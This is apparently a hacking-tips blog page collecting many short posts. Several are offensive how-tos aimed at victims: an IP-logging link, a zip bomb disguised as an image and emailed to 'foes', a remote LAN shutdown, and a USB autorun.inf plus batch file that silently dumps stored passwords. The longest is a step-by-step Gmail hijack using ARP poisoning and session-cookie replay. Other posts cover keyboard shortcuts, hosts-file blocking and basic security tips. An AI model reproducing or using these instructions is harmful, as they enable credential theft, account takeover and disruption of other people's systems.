Gather A WebSites Information

Gather A WebSites Information


1. Goto WebSite http://www.whois.com

Read more »

How To Get The IP Address Of Any Computer Remotely

Hello friends, today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one’s that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.

4 ways to get the IP address of the Victim or another Computer:

1. Using PHP notification Script

2. Using Blogs and Websites

3. Using Read Notify service

4. Sniffing during Gmail and Yahoo chat sessions

As we are here to learn concepts so i will first explain what is an IP address and what’s its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?

What is an IP address? 

Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication).

IP address serves for two basic purposes:

1. Host or network interface identification

2. Location Addressing

For exploring more about IP addressing read on wikipedia.

How to Find IP address of another computer?

1. Using PHP notification Script

Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:

a. Download the PHP notify script and extract files.

Download here

b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.

Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there.

c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.

d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.

e. That’s all this method… I hope you liked it.

2. Using Blogs and Websites

This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

That’s only.

3. Using Read Notify service

This is an email based service. Steps to use Read Notify service:

a. First open the Read Notify website : RCPT

b. Now register on this website and then it will send you confirmation mail. Verify your account.

c. Once your account is activated.

Do the following steps use this service:

1. Compose your email just like you usually would in your own email or web email program
2. Type:   .readnotify.com   on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com .readnotify.com
3. Send your email

Some things to remember:

• don’t send to and from the same computer
• if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keep typing over the top of the auto-completed one to add the .readnotify.com
• if you are cc-ing your email to other readers, you must add tracking to all of them

4.  Sniffing Yahoo and Gmail Chat sessions

With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there. I will explain this trick in detail in my next article as its a long article in itself.

5. Bonus Method for Online Gamers

We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type “status”(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.

 

Read more »

All keyboard Shortcuts

• Shift + F10 right-clicks.
• Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
• Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
• Win + Control + F: Open Find dialog. (Computers)
• Win + U: Open Utility Manager.
• Win + F1: Open Windows help.
• Win + Pause: Open System Properties dialog.
• Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
• Win + Shift + Tab: Cycle through taskbar buttons in reverse.
• Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
• Alt + Shift + Tab: Display Cool Switch; go in reverse.
• Alt + Escape: Send active window to the bottom of the z-order.
• Alt + Shift + Escape: Activate the window at the bottom of the z-order.
• Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
  • Shift while a CD is loading: Bypass AutoPlay.
  • Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
  • Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
  • Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
  • Print screen: Copy screenshot of current screen to clipboard.
  • Alt + Print screen: Copy screenshot of current active window to clipboard.
  • Ctrl + Alt + Down Arrow: Invert screen. Untested on OS’s other than XP.
  • Ctrl + Alt + Up Arrow: Undo inversion.
  • Win + B : Move focus to systray icons.
  
  

  General

  • Ctrl + C or Ctrl + Insert: Copy.
  • Ctrl + X or Shift + Delete: Cut.
  • Ctrl + V or Shift + Insert: Paste/Move.
  • Ctrl + N: New… File, Tab, Entry, etc.
  • Ctrl + S: Save.
  • Ctrl + O: Open…
  • Ctrl + P: Print.
  • Ctrl + Z: Undo.
  • Ctrl + A: Select all.
  • Ctrl + F: Find…
  • Ctrl+W : to close the current window
  • Ctrl + F4: Close tab or child window.
  • F1: Open help.
  • F11: Toggle full screen mode.
  • Alt or F10: Activate menu bar.
  • Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
  • Escape: Remove focus from current control/menu, or close dialog box.

  
  General Navigation
  

  • Tab: Forward one item.
  • Shift + Tab: Backward one item.
  • Ctrl + Tab: Cycle through tabs/child windows.
  • Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
  • Enter: If a button’s selected, click it, otherwise, click default button.
  • Space: Toggle items such as radio buttons or checkboxes.
  • Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item’s name.
  • Ctrl + Left: Move cursor to the beginning of previous word.
  • Ctrl + Right: Move cursor to the beginning of next word.
  • Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
  • Ctrl + Down: Move cursor to beginning of next paragraph.
  • Shift + Left: Highlight one character to the left.
  • Shift + Right: Highlight one character to the right.
  • Shift + Up: Highlight from current cursor position, to one line up.
  • Shift + Down: Highlight from current cursor position, to one line down.
  • Ctrl + Shift + Left: Highlight to beginning of previous word.
  • Ctrl + Shift + Right: Highlight to beginning of next word.
  • Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
  • Ctrl + Shift + Down: Highlight to beginning of next paragraph.
  • Home: Move cursor to top of a scrollable control.
  • End: Move cursor to bottom of a scrollable control.

  
  File Browser

  • Arrow Keys: Navigate.
  • Shift + Arrow Keys: Select multiple items.
  • Ctrl + Arrow Keys: Change focus without changing selection. “Focus” is the object that will run on Enter. Space toggles selection of the focused item.
  • (Letter): Select first found item that begins with (Letter).
  • BackSpace: Go up one level to the parent directory.
  • Alt + Left: Go back one folder.
  • Alt + Right: Go forward one folder.
  • Enter: Activate (Double-click) selected item(s).
  • Alt + Enter: View properties for selected item.
  • F2: Rename selected item(s).
  • Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
  • Delete: Delete selected item(s).
  • Shift + Delete: Delete selected item(s); bypass Recycle Bin.
  • Ctrl while dragging item(s): Copy.
  • Ctrl + Shift while dragging item(s): Create shortcut(s).
  • In tree pane, if any:
  • Left: Collapse the current selection if expanded, or select the parent folder.
  • Right: Expand the current selection if collapsed, or select the first subfolder.
  • Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
  • Numpad Plus: Expand currently selected directory.
  • Numpad Minus: Collapse currently selected directory.

  
  Accessibility

  • Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
  • Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
  • Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
  • NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
  • Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
  • 6.) Microsoft Natural Keyboard with IntelliType Software Installed
  • Win + L: Log off Windows.
  • Win + P: Open Print Manager.
  • Win + C: Open control panel.
  • Win + V: Open clipboard.
  • Win + K: Open keyboard properties.
  • Win + I: Open mouse properties.
  • Win + A: Open Accessibility properties.
  • Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
  • Win + S: Toggle CapsLock on and off.

  Remote Desktop Connection Navigation

  
  
  • Ctrl + Alt + End: Open the NT Security dialog.
  • Alt + PageUp: Switch between programs.
  • Alt + PageDown: Switch between programs in reverse.
  • Alt + Insert: Cycle through the programs in most recently used order.
  • Alt + Home: Display start menu.
  • Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
  • Alt + Delete: Display the Windows menu.
  • Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
  • Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.

  Mozilla Firefox Shortcuts

  • Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
  • Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
  • Ctrl + (1-9): Switch to tab corresponding to number.
  • Ctrl + N: New window.
  • Ctrl + T: New tab.
  • Ctrl + L or Alt + D or F6: Switch focus to location bar.
  • Ctrl + Enter: Open location in new tab.
  • Shift + Enter: Open location in new window.
  • Ctrl + K or Ctrl + E: Switch focus to search bar.
  • Ctrl + O: Open a local file.
  • Ctrl + W: Close tab, or window if there’s only one tab open.
  • Ctrl + Shift + W: Close window.
  • Ctrl + S: Save page as a local file.
  • Ctrl + P: Print page.
  • Ctrl + F or F3: Open find toolbar.
  • Ctrl + G or F3: Find next…
  • Ctrl + Shift + G or Shift + F3: Find previous…
  • Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
  • Ctrl + H: Open History sidebar.
  • Escape: Stop loading page.
  • Ctrl + R or F5: Reload current page.
  • Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
  • Ctrl + U: View page source.
  • Ctrl + D: Bookmark current page.
  • Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
  • Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
  • Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
  • Alt + Left or Backspace: Back.
  • Alt + Right or Shift + Backspace: Forward.
  • Alt + Home: Open home page.
  • Ctrl + M: Open new message in integrated mail client.
  • Ctrl + J: Open Downloads dialog.
  • F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
  • Shift + F6: Switch to previous frame.
  • Apostrophe (‘): Find link as you type.
  • Slash (/): Find text as you type.

  Gmail Shortcuts

  • Note: Must have “keyboard shortcuts” on in settings.
  • C: Compose new message.
  • Shift + C: Open new window to compose new message.
  • Slash (/): Switch focus to search box.
  • K: Switch focus to the next most recent email. Enter or “O” opens focused email.
  • J: Switch focus to the next oldest email.
  • N: Switch focus to the next message in the “conversation.” Enter or “O” expands/collapses messages.
  • P: Switch focus to the previous message.
  • U: Takes you back to the inbox and checks for new mail.
  • Y: Various actions depending on current view:
  • Has no effect in “Sent” and “All Mail” views.
  • Inbox: Archive email or message.
  • Starred: Unstar email or message.
  • Spam: Unmark as spam and move back to “Inbox.”
  • Trash: Move back to “Inbox.”
  • Any label: Remove the label.
  • X: “Check” an email. Various actions can be performed against all checked emails.
  • S: “Star” an email. Identical to the more familiar term, “flagging.”
  • R: Reply to the email.
  • A: Reply to all recipients of the email.
  • F: Forward an email.
  • Shift + R: Reply to the email in a new window.
  • Shift + A: Reply to all recipients of the email in a new window.
  • Shift + F: Forward an email in a new window.
  • Shift + 1 (!): Mark an email as spam and remove it from the inbox.
  • G then I: Switch to “Inbox” view.
  • G then S: Switch to “Starred” view.
  • G then A: Switch to “All Mail” view.
  • G then C: Switch to “Contacts” view.
  • G then S: Switch to “Drafts” view.

  List of F1-F9 Key Commands for the Command Prompt

  
  
  • F1 / right arrow: Repeats the letters of the last command line, one by one.
  • F2: Displays a dialog asking user to “enter the char to copy up to” of the last command line
  • F3: Repeats the last command line
  • F4: Displays a dialog asking user to “enter the char to delete up to” of the last command line
  • F5: Goes back one command line
  • F6: Enters the traditional CTRL+Z (^z)
  • F7: Displays a menu with the command line history
  • F8: Cycles back through previous command lines (beginning with most recent)
  • F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
  • Alt+Enter: toggle full Screen mode.
  • up/down: scroll thru/repeat previous entries
  • Esc: delete line
  • Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.
  Helpful accessibility keyboard shortcuts
  
  • Switch FilterKeys on and off. Right SHIFT for eight seconds
  • Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
  • Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
  • Switch StickyKeys on and off. SHIFT five times
  • Switch ToggleKeys on and off. NUM LOCK for five seconds

Read more »

Creating A Zip Bomb

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirussoftware, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don’t detonate it on yourself.
Here is how to make your own Zip of Death

Create a new text file,name it a.txt




Open and type the null character (alt + 255) in it.
Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.If u have a hex editor,then make the hex 00 for about 50 kilobytes.
Now make several copies of a.txt in the same directory and name them accordingly.

Open Command prompt and navigate to the folder containing a.txt . Type - copy /b *.txt b.txt

This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from the beginning again and again to make a really big text file.
Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or Winzip into a zip file.
You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.
 For added fun,open the compressed zip file file into a hex editor. You will see a bunch of hex 5555.Just add some more and the file will expand amazingly.

Make sure that YOU DONT OPEN THIS afterwards.

Send it to your friends (or foes) and it will definitely annoy them . Use some creativity and rename the text file into some thing like Angelina Jolie.jpg and compress it and email to your friends. Once they download it,they will never be able to download again (sarcasm..sarcasm).More disastrous combinations can be made by experimenting with it.I mean..you get the idea
Also,you can check out the one of the most famous zip bombs alive today – 42.zip (only 42 KB) which will uncompress to about 4 Petabytes (1 Peta byte = 1024 TB and 1 TB = 1024 GB ) of file size. Dangerous huh..?

Read more »

Finding The MAC ADRESS

How to Find MA ADDRESS of COMPUTERS

1. open CMD.
2. TYPE arp -a. it will list all the related MAC ADDRESSES
3. To DELETE ALL the ENTERIES in the table, just replace -a with -d.
4. Then No Entries Will Be Shown.

 

Read more »

Shut Down A PC in a LAN network

Steps to Shut Down A Pc in a Network...

I will not be responsible for all the other consequences U get into... This all is for Educational Purpose.

1. Open CMD.
2. Type shutdown -s -t 10 -m <the ip address of  the Remote PC.>
3. Then Press Enter.

SHUTDOWN is an inbuilt command in WINDOWS command prompt. you can know more about it By typing  SHUTDOWN ./ 
And then you can plan more attacks on the remote PC.

Read more »

Finding Name Servers Of A web Site

Steps to find name Server Of A Web Site:

1. Goto start and Click on Run.
2. In run type cmd and press enter.
3.In the CMD window type nslookup.
4. Then infront of > type set type=ns
5. Then type the name of the Web Site Whose name server You Want to find.

Read more »

DFX (audio enhancer)

DFX (audio enhancer)

DFX is a audio enhancer for winamp .it has many features like

• 3D surround sound.
• Hyperbass.
• dynamic gain boosting.
• 5.1/7.1 surround sound support.
• dynamic sound spectrum analyzer.
• finely tuned music presets. 

and many more....

DOWNLOAD (torrent link)

Read more »

Disable/Enable USB Ports from Registry

Steps to disable USB Ports from registry

The steps to disable USB Ports from registry are:

1. Click on start and go to Run

2. Type regedit on Run window and press enter

Now the registry editor will be opened.

3. Navigate to following registry path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

4. Click on UsbStor and a list of attributes will be displayed on the right panel.



5. Double click on start and set the hexadecimal value to 4 and click OK.

Now the USB ports on your computer will be disabled.

How to enable USB Ports on your computer

To enable USB Port on your computer follow the steps 1 to 4 and set the hexadecimal value to 3 on start.

Read more »

How to Steal Passwords with a USB in just Seconds

Steal Passwords with a USB

Step 1 :  Open Notepad/Wordpad
Type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save this as AUTORUN.inf
Step2 : Open a new Notepad/Wordpad document
Type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
Save this as LAUNCH.bat
Step 3 : Copy the autorun and launch file to your USB
Step 4 : Go to http://www.nirsoft.net/ and download the programs named in Step 2.
Step 5 :  Extract the files you downloaded to your desktop and copy all the .exe files to your USB
Step 6 : Remove and re-insert your USB
Step 7 : Click on the option ” perform a virus scan”
(this is an exemple, if you want it to say something else go to the autorun file and change it )
Step 8 : Go to “my computer”—> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE : This only recovers passwords that have once been saved on your computer (if it didn’t crash during the years
msn passwords will not be shown because almost nobody saves those.
Have fun

Read more »

Hack Gmail Accounts Using GX Cookie- Gmail Hacking

Introduction:
The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.
The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.
Assumption:
* You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber cafe, Mall etc.
* You know basic networking.
Tool used for this attack:
* Cain & Abel
* Network Miner
* Firefox web browser with Cookie Editor add-ons
Working of Attack:
We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber cafe or in Mall then there are more chances of catching people using Gmail.
We will go step by step, If you are using Wireless network then you can skip this Step A
Step A – Using Cain to do ARP poisoning and routing:
Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
Start Cain from Start > Program > Cain > Cain
Click on Start/Stop Sniffer tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the slave. Read more:
Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select Read more:
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.
Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
Click on Configure > APR > Use Spoofed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.
Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the slave IP address and the default gateway.
The purpose is to do ARP poisoning between slave and the default gateway and route the slave traffic via your machine. From the left side click on slave IP address, we assume slave is using 192.168.1.15. The moment you click on slave IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning slave and default gateway.
Step B – Using Network Miner to capture cookie in plain text :
We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.
We are using This tool because of its ease to use.
Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
From the “—Select network adaptor in the list—“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon.
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv
Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to slave email id, for this we will use firefox and cookie editor add-ons.
Step C – Using Firefox & cookie Editor to replay attack :
Open Firefox and log in your gmail email account.
from firefox click on Tools > cookie Editor.
In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
From the Address bar of Firefox type mail.google.com and press enter, this should replay slave GX cookie to Gmail server and you would get logged in to slave Gmail email account.
Sorry! You can’t change password with cookie attack.
How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https.

Read more »

How to Bypass Gmail Sms Verification – New Trick

Bypass Gmail Sms Verification

Step 1)  Create a Google Adwords Account.
Step 2)  Click ‘I do not have a Google Account’ or ‘i dont use these services’ .
Step 3)  Create One.
Step 4) It will create a new Google Account without a Phone Number.
Step 5) You can now use all there services like youtube without a Sms Verification.
Enjoy !

Read more »

How to Detect Anonymous IP Addresses

As the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.

1. Credit Card Frauds

For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.

2. Bypass Website Country Restrictions

Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.

Proxy Detection Services

So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.

Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.

How Proxy Detection Works?

Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.

The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.

How to Tell Whether a given IP is Real or a Proxy?

There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.

Read more »

Enable Right Clicks on The Sites That Disable it

Enable Right Clicks on The Sites That Disable it

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.


It's easy to change, assuming your using IE 6:

Click "Tools"->"Internet Options"

Click the "Security" tab

Click "Custom Level"

Scroll down to the "Scripting" section

Set "Active Scripting" to "disable"

Click "Ok" a couple of times.


You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Read more »

Block Websties Without Software

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.

5] Done!

-So-



127.0.0.1 localhost

127.0.0.2 www.blockedsite.com



For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.


IE: 127.0.0.3 www.blablabla.com

127.0.0.4 www.blablabla.com

127.0.0.5 www.blablabla.com

Read more »

Read more »

10 Fast and Free Security Enhancements

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

 

2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

 

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

 

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

 

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

 

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

 

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

 

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

 

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

Read more »